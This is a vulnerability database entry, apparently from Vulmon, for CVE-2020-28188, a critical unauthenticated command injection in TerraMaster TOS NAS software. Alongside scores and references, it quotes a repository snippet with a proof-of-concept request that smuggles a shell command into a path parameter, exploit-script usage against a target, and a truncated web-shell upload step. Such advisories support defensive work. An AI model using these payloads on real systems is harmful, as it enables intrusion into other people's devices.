Published: 24/12/2020 Updated: 12/06/2023

CVSS v2 Base Score: 10 | Impact Score: 10 | Exploitability Score: 10

CVSS v3 Base Score: 9.8 | Impact Score: 5.9 | Exploitability Score: 3.9

VMScore: 890

Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C

Remote Command Execution (RCE) vulnerability in TerraMaster TOS <= 4.2.06 allow remote unauthenticated malicious users to inject OS commands via /include/makecvs.php in Event parameter.

Vulnerable Product	Search on Vulmon	Subscribe to Product
terra-master tos

RCE _ TOS

RCE_TOS Unauthenticated Remote Command Execution CVE-2020-28188 Vulnerable page: /include/makecvsphp Vulnerable parameter: Event Proof of Concept: GET /tos/indexphp?explorer/pathList&path=%60touch%20/tmp/file%60 HTTP/11 Cara Menggunakan pip install requests python3 RCEPY --url targetcom:8181 Upload Shell wget rawgithubusercontentcom/linuxsec/in

CWE-78 https://www.terra-master.com/https://www.ihteam.net/advisory/terramaster-tos-multiple-vulnerabilities/https://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/http://packetstormsecurity.com/files/172880/TerraMaster-TOS-4.2.06-Remote-Code-Execution.html https://nvd.nist.gov https://github.com/Dark-Clown-Security/RCE_TOS

Get Started

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

CVE-2020-28188

Vulnerability Summary

Vulnerability Trend

Github Repositories

References

Vulmon Search

About

Products

Connect